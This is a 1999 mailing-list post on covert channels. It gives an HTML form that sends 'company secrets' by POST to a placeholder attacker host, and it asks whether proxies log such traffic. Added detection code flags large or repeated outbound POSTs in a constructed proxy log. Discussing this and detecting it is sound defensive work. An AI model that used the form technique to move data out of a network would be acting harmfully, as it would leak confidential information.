Firewall Wizards mailing list archives
RE: Covert Channels (was dns outbound)
From: "Mayne, Peter" <Peter.Mayne () compaq com>
Date: Mon, 31 May 1999 14:43:14 +0800
Why bother with low-bandwidth DNS traffic? Write yourself a .htm file containing the following:

    <form action="http://naughty-server.domain.com/accept.cgi" method="post">
    <input type="text" name="i1" value="Here are the company secrets.">
    <input type="text" name="i2" value="Widget V2 will be released on 1-Jul-1999.">
    <input type="submit" name="submit" value="Send Secrets">
    </form>

(It's obviously a trivial exercise to write a Perl script that takes a Word document and MIME encodes it appropriately.)

Load the file into your favourite browser, hit the submit button, and let accept.cgi write the form data somewhere convenient.

How many proxies will log the contents of the form? Shouldn't this data be logged somewhere? (Of course, if you don't log the contents of your outgoing mail, why bother logging this stuff? Not to mention those pocket-sized DATs.)

HTTP has always been a quick and easy way of sending data. It doesn't help that everyone on the planet (and probably some off it) is using HTTP as a transport for whatever they happen to be interested in (RealPlayer, Microsoft's DCOM, SETI@Home 8-).

Stopping covert channels on a system is frightfully difficult. How do you stop someone from doing Morse code using CPU usage, for instance? (Three short do-nothing loops, three long do-nothing loops, three short do-nothing loops.)

PJDM
----
Peter Mayne, Compaq Computer Australia, Canberra, ACT
These are my opinions, and have nothing to do with Compaq.
"The wise man knows that he knows nothing." - Bill.
"That's us, dude!" - Ted.
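The post's question about which proxies log outbound form data points at the defensive side: even a proxy that does not retain request bodies usually records the method, destination and request size, and that is enough to spot a single large POST to an unexpected host, or the same data trickled out as many small POSTs. The following script is an added example, not from the original post or any proxy vendor; it reads a simplified, made-up log format (timestamp, client, method, URL, request bytes, status), the hostnames, addresses and thresholds are constructed placeholders, and the allow-list of business destinations is an assumption.

```python
"""Flag outbound HTTP POST traffic in proxy logs that deserves a closer look.

Constructed example: the log format below is a simplified, invented one
(timestamp client method url request_bytes status), not Squid's or any
real proxy's native format. Hosts, addresses and thresholds are placeholders.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Destinations where large POST bodies are expected (assumed business hosts).
ALLOWED_POST_HOSTS = {"intranet.example.com", "mail.example.com"}

# A single POST body at or above this size is flagged on its own.
LARGE_POST_BYTES = 64 * 1024

# Total POST bytes per (client, host) pair at or above this size are flagged,
# to catch data sent out as many small requests instead of one big one.
AGGREGATE_POST_BYTES = 256 * 1024

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+(?P<req_bytes>\d+)\s+(?P<status>\d{3})$"
)


def parse_line(line):
    """Parse one log line into a dict; return None for malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["req_bytes"] = int(rec["req_bytes"])
    rec["host"] = (urlsplit(rec["url"]).hostname or "").lower()
    return rec


def find_suspicious_posts(lines):
    """Return a list of (reason, client, host, bytes) findings.

    'large-post' entries are emitted in log order as they are seen;
    'aggregate-post' entries are appended afterwards, sorted by (client, host).
    """
    findings = []
    totals = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        client, host, n = rec["client"], rec["host"], rec["req_bytes"]
        if host in ALLOWED_POST_HOSTS:
            continue
        if n >= LARGE_POST_BYTES:
            findings.append(("large-post", client, host, n))
        totals[(client, host)] += n
    for (client, host), n in sorted(totals.items()):
        if n >= AGGREGATE_POST_BYTES:
            findings.append(("aggregate-post", client, host, n))
    return findings


# Constructed sample log: one ordinary GET, one legitimate large POST to an
# allowed host, one large POST to an unknown host, seven small POSTs from a
# second client to the same unknown host, and one malformed line.
SAMPLE_LOG = """\
2024-05-31T09:00:01Z 10.0.0.5 GET http://www.example.org/index.html 0 200
2024-05-31T09:00:04Z 10.0.0.5 POST http://intranet.example.com/timesheet 120000 200
2024-05-31T09:00:09Z 10.0.0.7 POST http://naughty-server.example.net/accept.cgi 98304 200
2024-05-31T09:01:00Z 10.0.0.9 POST http://naughty-server.example.net/accept.cgi 40000 200
2024-05-31T09:01:05Z 10.0.0.9 POST http://naughty-server.example.net/accept.cgi 40000 200
2024-05-31T09:01:10Z 10.0.0.9 POST http://naughty-server.example.net/accept.cgi 40000 200
2024-05-31T09:01:15Z 10.0.0.9 POST http://naughty-server.example.net/accept.cgi 40000 200
2024-05-31T09:01:20Z 10.0.0.9 POST http://naughty-server.example.net/accept.cgi 40000 200
2024-05-31T09:01:25Z 10.0.0.9 POST http://naughty-server.example.net/accept.cgi 40000 200
2024-05-31T09:01:30Z 10.0.0.9 POST http://naughty-server.example.net/accept.cgi 40000 200
this line is not a log entry
"""

if __name__ == "__main__":
    for reason, client, host, n in find_suspicious_posts(SAMPLE_LOG.splitlines()):
        print(f"{reason:15} client={client:10} host={host} bytes={n}")
```

On the sample log this reports one large-post finding for 10.0.0.7 (98304 bytes in a single request) and one aggregate-post finding for 10.0.0.9 (280000 bytes across seven requests that are each individually under the single-request threshold). The two thresholds are deliberately separate: the per-request one catches the one-shot form submit described in the post, the per-pair total catches the same data split into pieces.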